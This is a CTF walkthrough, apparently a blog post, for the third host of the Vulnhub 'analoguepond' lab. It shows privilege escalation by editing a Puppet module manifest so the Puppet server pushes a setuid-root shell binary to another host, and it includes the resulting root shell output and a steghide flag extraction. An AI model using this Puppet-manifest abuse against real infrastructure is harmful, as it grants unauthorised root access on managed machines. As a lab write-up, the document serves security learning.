[Vulnhub] analoguepond - Walkthrough Part 3

Hi, guys.
Ok, now I'm in the third host. nleeson@barringsbank:~$

I found this 'lovely' file again at the home dir: reticulatingsplines.gif, remember that I've got a .gif with the same name in part 1? This is also nothing special.

Then, I tried netstat, nothing apart from ssh. Looked at uname, at least not obviously vulnerable. Searched for suid and sgid, nothing interesting. Navigate to /etc? Oh, I saw the familiar puppet folder, but there is nothing interesting inside.

Then, after taking a look at Fabian's walkthrough, I finally knew what to do.

These two hosts form a puppet system, which means it can transmit files with root permission between systems. So now that I have the root permission of the puppet server, I can create a suid file, like the spin, and throw it on to nleeson's host.

I don't need to transmit the new spin file from 192.168.122.2 to .3, I just need to modify the target in puppet configuration.

I ever noticed this in 192.168.122.2:

sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

I don't know the details of what does this mean, but I think now that I used wiggle to synchronize files in puppet, I should use fiveeights in barringsbank. Also, the init.pp inside fiveeights supports my idea because this authorized_keys matches exactly the file on barringsbank host.

sandieshaw@puppet:/etc/puppet/modules/fiveeights/manifests$ cat init.pp
## Nick's secret file hide the screw-ups
class fiveeights {

## private key held elsewhere. Keep looking
  file { '/home/nleeson/.ssh/authorized_keys':
  content => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCTPnm+I5zEPNUHc1PgmsIxK8XCvtRECY6nTFOdNL3CxVBepWLv0wgPWBIUAkP9nfPUshXo1EIjcvb0+RGtJ8KNbVK4vW2ZCwgNicUoYnCcVtSrGtz9oAnKpeGcCKAuHG6ybt4Opxe75eF4dZt2/aDRrPMw8PK8l8a3o9ZdJlIgdLiWORPiga/zUu1zuySkQPFHzPBp29MvWVwAYsssEjcXINfuvysPbdBzMJaJ2o4jmFV9g/uCz3xjRi9zULP1VpoRYtZUQadU2CpuN1RtVDeoSeYVe6vYkeLz6rCBQTUfi9Nea4X1JtvaTfnrquRMWOr43WnMMcdFpIsBd8oCI4jH root@puppet",
  }
}

Now modify init.pp to transmit spin

sandieshaw@puppet:/etc/puppet/modules/fiveeights/manifests$ cat init.pp
class fiveeights {
  file { [ "/tmp/spin" ]:
    ensure  => present,
    mode    => 4755,
    owner   => root,
    group   => root,
    source  => "puppet:///modules/wiggle/spin";
  }
}

I waited for a couple of minutes, executed it, and there we go.

nleeson@barringsbank:~$ /tmp/spin 
# whoami
root
# id
uid=1000(nleeson) gid=1000(nleeson) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(nleeson)
# cd /root
# ls -la
total 236
drwx------  3 root    root      4096 Jan  7  2017 .
drwxr-xr-x 22 root    root      4096 Jan  7  2017 ..
-rw-r--r--  1 root    root      3106 Feb 20  2014 .bashrc
-rw-rw-r--  1 nleeson nleeson 220099 Dec 21  2016 me.jpeg
-rw-r--r--  1 root    root       140 Feb 20  2014 .profile
drwx------  2 root    root      4096 Dec 18  2016 .ssh

Ok, me.jpeg, it should be you.

Tunnel the me.jpeg out to my kali, check the info:

root@kali:~/vulnerhub/analoguepond# steghide --info me.jpeg 
"me.jpeg":
  format: jpeg
  capacity: 11.9 KB
Try to get information about embedded data ? (y/n) 
Enter passphrase: 
  embedded file "primate_egyptian_flag.txt":
    size: 3.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes

It asked for passphrase, I don't think I have anything left except those two reticulatingsplines.gif files. So I provide 'reticulatingsplines', and it passed!

Now extract the file from it.

root@kali:~/vulnerhub/analoguepond# steghide extract -sf me.jpeg -p reticulatingsplines

I got a primate_egyptian_flag.txt

Cooked it in the same way:

root@kali:~/vulnerhub/analoguepond# xxd -r -p primate_egyptian_flag.txt | rev | base64 --decode 

Here's a fender bass for you...

                                  ,-.        _.---._
                                |  `\.__.-''       `.
                                 \  _        _  ,.   \
           ,+++=._________________)_||______|_|_||    |
          (_.ooo.===================||======|=|=||    |
             ~~'                 |  ~'      `~' o o  /
                                  \   /~`\     o o  /
                                   `~'    `-.____.-' 


Congratulations to you once again and for the sixth time on capturing this
flag! 

I've tried to mix things up a bit here, to move away from throw metasploit
and web exploits at things. I hope you have enjoyed that portion and your
feedback on this aspect would be appreciated.

Of note, these VMs are set to do automatic security updates using puppet,
so this ought to keep things dynamic enough for people.

Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.

A special thank you to g0tmi1k for hosting all these challenges and the
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
me on IRC or twitter if you are looking for a hint or have completed the
challenge.

Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In The North (C) BBC 1995.. What's the connection....?
                                                           --Knightmare

Sweet! Finally! Got the flag! :D

Thank you dude, this is a good box, I learned many things.

As for the last video, I've watched it, nothing special found. I don't know what 'complete the circle' means. I also don't know why he says 'what's the connection....?'

But, anyway, I assume this is the end of it. If anyone knows about the following or have any suggestion, please leave a comment.

That's it. Thank you very much!

Cheers!